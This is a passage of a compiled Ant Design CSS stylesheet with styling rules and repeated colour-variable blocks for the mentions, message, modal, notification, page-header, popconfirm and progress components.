stylelint-disable-next-line selector-no-vendor-prefix */ } .ant-mentions > textarea::-moz-placeholder { opacity: 1; } .ant-mentions > textarea:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-mentions > textarea::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-mentions > textarea:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-mentions > textarea:-ms-input-placeholder { text-overflow: ellipsis; } .ant-mentions > textarea:placeholder-shown { text-overflow: ellipsis; } .ant-mentions-measure { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: -1; color: transparent; pointer-events: none; } .ant-mentions-measure > span { display: inline-block; min-height: 1em; } .ant-mentions-dropdown { margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; top: -9999px; left: -9999px; z-index: 1050; box-sizing: border-box; font-size: 14px; font-variant: initial; background-color: #fff; border-radius: 2px; outline: none; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-mentions-dropdown-hidden { display: none; } .ant-mentions-dropdown-menu { max-height: 250px; margin-bottom: 0; padding-left: 0; overflow: auto; list-style: none; outline: none; } .ant-mentions-dropdown-menu-item { position: relative; display: block; min-width: 100px; padding: 5px 12px; overflow: hidden; color: rgba(0, 0, 0, 0.85); font-weight: normal; line-height: 1.5715; white-space: nowrap; text-overflow: ellipsis; cursor: pointer; transition: background 0.3s ease; } .ant-mentions-dropdown-menu-item:hover { background-color: #f5f5f5; } .ant-mentions-dropdown-menu-item:first-child { border-radius: 2px 2px 0 0; } .ant-mentions-dropdown-menu-item:last-child { border-radius: 0 0 2px 2px; } .ant-mentions-dropdown-menu-item-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-mentions-dropdown-menu-item-disabled:hover { color: rgba(0, 0, 0, 0.25); background-color: #fff; cursor: not-allowed; } .ant-mentions-dropdown-menu-item-selected { color: rgba(0, 0, 0, 0.85); font-weight: 600; background-color: #fafafa; } .ant-mentions-dropdown-menu-item-active { background-color: #f5f5f5; } .ant-mentions-rtl { direction: rtl; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-message { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: fixed; top: 8px; left: 0; z-index: 1010; width: 100%; pointer-events: none; } .ant-message-notice { padding: 8px; text-align: center; } .ant-message-notice-content { display: inline-block; padding: 10px 16px; background: #fff; border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); pointer-events: all; } .ant-message-success .anticon { color: var(--ant-success-color); } .ant-message-error .anticon { color: var(--ant-error-color); } .ant-message-warning .anticon { color: var(--ant-warning-color); } .ant-message-info .anticon, .ant-message-loading .anticon { color: var(--ant-info-color); } .ant-message .anticon { position: relative; top: 1px; margin-right: 8px; font-size: 16px; } .ant-message-notice.ant-move-up-leave.ant-move-up-leave-active { -webkit-animation-name: MessageMoveOut; animation-name: MessageMoveOut; -webkit-animation-duration: 0.3s; animation-duration: 0.3s; } @-webkit-keyframes MessageMoveOut { 0% { max-height: 150px; padding: 8px; opacity: 1; } 100% { max-height: 0; padding: 0; opacity: 0; } } @keyframes MessageMoveOut { 0% { max-height: 150px; padding: 8px; opacity: 1; } 100% { max-height: 0; padding: 0; opacity: 0; } } .ant-message-rtl { direction: rtl; } .ant-message-rtl span { direction: rtl; } .ant-message-rtl .anticon { margin-right: 0; margin-left: 8px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-modal { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; pointer-events: none; position: relative; top: 100px; width: auto; max-width: calc(100vw - 32px); margin: 0 auto; padding-bottom: 24px; } .ant-modal.ant-zoom-enter, .ant-modal.antzoom-appear { transform: none; opacity: 0; -webkit-animation-duration: 0.3s; animation-duration: 0.3s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-modal-mask { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1000; height: 100%; background-color: rgba(0, 0, 0, 0.45); } .ant-modal-mask-hidden { display: none; } .ant-modal-wrap { position: fixed; top: 0; right: 0; bottom: 0; left: 0; overflow: auto; outline: 0; -webkit-overflow-scrolling: touch; } .ant-modal-wrap { z-index: 1000; } .ant-modal-title { margin: 0; color: rgba(0, 0, 0, 0.85); font-weight: 500; font-size: 16px; line-height: 22px; word-wrap: break-word; } .ant-modal-content { position: relative; background-color: #fff; background-clip: padding-box; border: 0; border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); pointer-events: auto; } .ant-modal-close { position: absolute; top: 0; right: 0; z-index: 10; padding: 0; color: rgba(0, 0, 0, 0.45); font-weight: 700; line-height: 1; text-decoration: none; background: transparent; border: 0; outline: 0; cursor: pointer; transition: color 0.3s; } .ant-modal-close-x { display: block; width: 56px; height: 56px; font-size: 16px; font-style: normal; line-height: 56px; text-align: center; text-transform: none; text-rendering: auto; } .ant-modal-close:focus, .ant-modal-close:hover { color: rgba(0, 0, 0, 0.75); text-decoration: none; } .ant-modal-header { padding: 16px 24px; color: rgba(0, 0, 0, 0.85); background: #fff; border-bottom: 1px solid #f0f0f0; border-radius: 2px 2px 0 0; } .ant-modal-body { padding: 24px; font-size: 14px; line-height: 1.5715; word-wrap: break-word; } .ant-modal-footer { padding: 10px 16px; text-align: right; background: transparent; border-top: 1px solid #f0f0f0; border-radius: 0 0 2px 2px; } .ant-modal-footer .ant-btn + .ant-btn:not(.ant-dropdown-trigger) { margin-bottom: 0; margin-left: 8px; } .ant-modal-open { overflow: hidden; } .ant-modal-centered { text-align: center; } .ant-modal-centered::before { display: inline-block; width: 0; height: 100%; vertical-align: middle; content: ''; } .ant-modal-centered .ant-modal { top: 0; display: inline-block; padding-bottom: 0; text-align: left; vertical-align: middle; } @media (max-width: 767px) { .ant-modal { max-width: calc(100vw - 16px); margin: 8px auto; } .ant-modal-centered .ant-modal { flex: 1; } } .ant-modal-confirm .ant-modal-header { display: none; } .ant-modal-confirm .ant-modal-body { padding: 32px 32px 24px; } .ant-modal-confirm-body-wrapper::before { display: table; content: ''; } .ant-modal-confirm-body-wrapper::after { display: table; clear: both; content: ''; } .ant-modal-confirm-body .ant-modal-confirm-title { display: block; overflow: hidden; color: rgba(0, 0, 0, 0.85); font-weight: 500; font-size: 16px; line-height: 1.4; } .ant-modal-confirm-body .ant-modal-confirm-content { margin-top: 8px; color: rgba(0, 0, 0, 0.85); font-size: 14px; } .ant-modal-confirm-body > .anticon { float: left; margin-right: 16px; font-size: 22px; } .ant-modal-confirm-body > .anticon + .ant-modal-confirm-title + .ant-modal-confirm-content { margin-left: 38px; } .ant-modal-confirm .ant-modal-confirm-btns { float: right; margin-top: 24px; } .ant-modal-confirm .ant-modal-confirm-btns .ant-btn + .ant-btn { margin-bottom: 0; margin-left: 8px; } .ant-modal-confirm-error .ant-modal-confirm-body > .anticon { color: var(--ant-error-color); } .ant-modal-confirm-warning .ant-modal-confirm-body > .anticon, .ant-modal-confirm-confirm .ant-modal-confirm-body > .anticon { color: var(--ant-warning-color); } .ant-modal-confirm-info .ant-modal-confirm-body > .anticon { color: var(--ant-info-color); } .ant-modal-confirm-success .ant-modal-confirm-body > .anticon { color: var(--ant-success-color); } .ant-modal-wrap-rtl { direction: rtl; } .ant-modal-wrap-rtl .ant-modal-close { right: initial; left: 0; } .ant-modal-wrap-rtl .ant-modal-footer { text-align: left; } .ant-modal-wrap-rtl .ant-modal-footer .ant-btn + .ant-btn { margin-right: 8px; margin-left: 0; } .ant-modal-wrap-rtl .ant-modal-confirm-body { direction: rtl; } .ant-modal-wrap-rtl .ant-modal-confirm-body > .anticon { float: right; margin-right: 0; margin-left: 16px; } .ant-modal-wrap-rtl .ant-modal-confirm-body > .anticon + .ant-modal-confirm-title + .ant-modal-confirm-content { margin-right: 38px; margin-left: 0; } .ant-modal-wrap-rtl .ant-modal-confirm-btns { float: left; } .ant-modal-wrap-rtl .ant-modal-confirm-btns .ant-btn + .ant-btn { margin-right: 8px; margin-left: 0; } .ant-modal-wrap-rtl.ant-modal-centered .ant-modal { text-align: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-notification { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: fixed; z-index: 1010; margin-right: 24px; } .ant-notification-topLeft, .ant-notification-bottomLeft { margin-right: 0; margin-left: 24px; } .ant-notification-topLeft .ant-notification-fade-enter.ant-notification-fade-enter-active, .ant-notification-bottomLeft .ant-notification-fade-enter.ant-notification-fade-enter-active, .ant-notification-topLeft .ant-notification-fade-appear.ant-notification-fade-appear-active, .ant-notification-bottomLeft .ant-notification-fade-appear.ant-notification-fade-appear-active { -webkit-animation-name: NotificationLeftFadeIn; animation-name: NotificationLeftFadeIn; } .ant-notification-close-icon { font-size: 14px; cursor: pointer; } .ant-notification-hook-holder { position: relative; } .ant-notification-notice { position: relative; width: 384px; max-width: calc(100vw - 24px * 2); margin-bottom: 16px; margin-left: auto; padding: 16px 24px; overflow: hidden; line-height: 1.5715; word-wrap: break-word; background: #fff; border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-notification-topLeft .ant-notification-notice, .ant-notification-bottomLeft .ant-notification-notice { margin-right: auto; margin-left: 0; } .ant-notification-notice-message { margin-bottom: 8px; color: rgba(0, 0, 0, 0.85); font-size: 16px; line-height: 24px; } .ant-notification-notice-message-single-line-auto-margin { display: block; width: calc(384px - 24px * 2 - 24px - 48px - 100%); max-width: 4px; background-color: transparent; pointer-events: none; } .ant-notification-notice-message-single-line-auto-margin::before { display: block; content: ''; } .ant-notification-notice-description { font-size: 14px; } .ant-notification-notice-closable .ant-notification-notice-message { padding-right: 24px; } .ant-notification-notice-with-icon .ant-notification-notice-message { margin-bottom: 4px; margin-left: 48px; font-size: 16px; } .ant-notification-notice-with-icon .ant-notification-notice-description { margin-left: 48px; font-size: 14px; } .ant-notification-notice-icon { position: absolute; margin-left: 4px; font-size: 24px; line-height: 24px; } .anticon.ant-notification-notice-icon-success { color: var(--ant-success-color); } .anticon.ant-notification-notice-icon-info { color: var(--ant-info-color); } .anticon.ant-notification-notice-icon-warning { color: var(--ant-warning-color); } .anticon.ant-notification-notice-icon-error { color: var(--ant-error-color); } .ant-notification-notice-close { position: absolute; top: 16px; right: 22px; color: rgba(0, 0, 0, 0.45); outline: none; } .ant-notification-notice-close:hover { color: rgba(0, 0, 0, 0.67); } .ant-notification-notice-btn { float: right; margin-top: 16px; } .ant-notification .notification-fade-effect { -webkit-animation-duration: 0.24s; animation-duration: 0.24s; -webkit-animation-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); animation-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); -webkit-animation-fill-mode: both; animation-fill-mode: both; } .ant-notification-fade-enter, .ant-notification-fade-appear { -webkit-animation-duration: 0.24s; animation-duration: 0.24s; -webkit-animation-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); animation-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); -webkit-animation-fill-mode: both; animation-fill-mode: both; opacity: 0; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-notification-fade-leave { -webkit-animation-duration: 0.24s; animation-duration: 0.24s; -webkit-animation-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); animation-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-notification-fade-enter.ant-notification-fade-enter-active, .ant-notification-fade-appear.ant-notification-fade-appear-active { -webkit-animation-name: NotificationFadeIn; animation-name: NotificationFadeIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-notification-fade-leave.ant-notification-fade-leave-active { -webkit-animation-name: NotificationFadeOut; animation-name: NotificationFadeOut; -webkit-animation-play-state: running; animation-play-state: running; } @-webkit-keyframes NotificationFadeIn { 0% { left: 384px; opacity: 0; } 100% { left: 0; opacity: 1; } } @keyframes NotificationFadeIn { 0% { left: 384px; opacity: 0; } 100% { left: 0; opacity: 1; } } @-webkit-keyframes NotificationLeftFadeIn { 0% { right: 384px; opacity: 0; } 100% { right: 0; opacity: 1; } } @keyframes NotificationLeftFadeIn { 0% { right: 384px; opacity: 0; } 100% { right: 0; opacity: 1; } } @-webkit-keyframes NotificationFadeOut { 0% { max-height: 150px; margin-bottom: 16px; opacity: 1; } 100% { max-height: 0; margin-bottom: 0; padding-top: 0; padding-bottom: 0; opacity: 0; } } @keyframes NotificationFadeOut { 0% { max-height: 150px; margin-bottom: 16px; opacity: 1; } 100% { max-height: 0; margin-bottom: 0; padding-top: 0; padding-bottom: 0; opacity: 0; } } .ant-notification-rtl { direction: rtl; } .ant-notification-rtl .ant-notification-notice-closable .ant-notification-notice-message { padding-right: 0; padding-left: 24px; } .ant-notification-rtl .ant-notification-notice-with-icon .ant-notification-notice-message { margin-right: 48px; margin-left: 0; } .ant-notification-rtl .ant-notification-notice-with-icon .ant-notification-notice-description { margin-right: 48px; margin-left: 0; } .ant-notification-rtl .ant-notification-notice-icon { margin-right: 4px; margin-left: 0; } .ant-notification-rtl .ant-notification-notice-close { right: auto; left: 22px; } .ant-notification-rtl .ant-notification-notice-btn { float: left; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-page-header { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; padding: 16px 24px; background-color: #fff; } .ant-page-header-ghost { background-color: inherit; } .ant-page-header.has-breadcrumb { padding-top: 12px; } .ant-page-header.has-footer { padding-bottom: 0; } .ant-page-header-back { margin-right: 16px; font-size: 16px; line-height: 1; } .ant-page-header-back-button { color: var(--ant-primary-color); text-decoration: none; outline: none; transition: color 0.3s; color: #000; cursor: pointer; } .ant-page-header-back-button:focus, .ant-page-header-back-button:hover { color: var(--ant-primary-color-hover); } .ant-page-header-back-button:active { color: var(--ant-primary-color-active); } .ant-page-header .ant-divider-vertical { height: 14px; margin: 0 12px; vertical-align: middle; } .ant-breadcrumb + .ant-page-header-heading { margin-top: 8px; } .ant-page-header-heading { display: flex; justify-content: space-between; } .ant-page-header-heading-left { display: flex; align-items: center; margin: 4px 0; overflow: hidden; } .ant-page-header-heading-title { margin-right: 12px; margin-bottom: 0; color: rgba(0, 0, 0, 0.85); font-weight: 600; font-size: 20px; line-height: 32px; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-page-header-heading .ant-avatar { margin-right: 12px; } .ant-page-header-heading-sub-title { margin-right: 12px; color: rgba(0, 0, 0, 0.45); font-size: 14px; line-height: 1.5715; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-page-header-heading-extra { margin: 4px 0; white-space: nowrap; } .ant-page-header-heading-extra > * { margin-left: 12px; white-space: unset; } .ant-page-header-heading-extra > *:first-child { margin-left: 0; } .ant-page-header-content { padding-top: 12px; } .ant-page-header-footer { margin-top: 16px; } .ant-page-header-footer .ant-tabs > .ant-tabs-nav { margin: 0; } .ant-page-header-footer .ant-tabs > .ant-tabs-nav::before { border: none; } .ant-page-header-footer .ant-tabs .ant-tabs-tab { padding-top: 8px; padding-bottom: 8px; font-size: 16px; } .ant-page-header-compact .ant-page-header-heading { flex-wrap: wrap; } .ant-page-header-rtl { direction: rtl; } .ant-page-header-rtl .ant-page-header-back { float: right; margin-right: 0; margin-left: 16px; } .ant-page-header-rtl .ant-page-header-heading-title { margin-right: 0; margin-left: 12px; } .ant-page-header-rtl .ant-page-header-heading .ant-avatar { margin-right: 0; margin-left: 12px; } .ant-page-header-rtl .ant-page-header-heading-sub-title { float: right; margin-right: 0; margin-left: 12px; } .ant-page-header-rtl .ant-page-header-heading-tags { float: right; } .ant-page-header-rtl .ant-page-header-heading-extra { float: left; } .ant-page-header-rtl .ant-page-header-heading-extra > * { margin-right: 12px; margin-left: 0; } .ant-page-header-rtl .ant-page-header-heading-extra > *:first-child { margin-right: 0; } .ant-page-header-rtl .ant-page-header-footer .ant-tabs-bar .ant-tabs-nav { float: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-popconfirm { z-index: 1060; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-progress { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; } .ant-progress-line { position: relative; width: 100%; font-size: 14px; } .ant-progress-steps { display: inline-block; } .ant-progress-steps-outer { display: flex; flex-direction: row; align-items: center; } .ant-progress-steps-item { flex-shrink: 0; min-width: 2px; margin-right: 2px; background: #f3f3f3; transition: all 0.3s; } .ant-progress-steps-item-active { background: var(--ant-primary-color); } .ant-progress-small.ant-progress-line, .ant-progress-small.ant-progress-line .ant-progress-text .anticon { font-size: 12px; } .ant-progress-outer { display: inline-block; width: 100%; margin-right: 0; padding-right: 0; } .ant-progress-show-info .ant-progress-outer { margin-right: calc(-2em - 8px); padding-right: calc(2em + 8px); } .ant-progress-inner { position: relative; display: inline-block; width: 100%; overflow: hidden; vertical-align: middle; background-color: #f5f5f5; border-radius: 100px; } .ant-progress-circle-trail { stroke: #f5f5f5; } .ant-progress-circle-path { -webkit-animation: ant-progress-appear 0.3s; animation: ant-progress-appear 0.3s; } .ant-progress-inner:not(.ant-progress-circle-gradient) .ant-progress-circle-path { stroke: var(--ant-primary-color); } .ant-progress-success-bg, .ant-progress-bg { position: relative; background-color: var(--ant-primary-color); border-radius: 100px; transition: all 0.4s 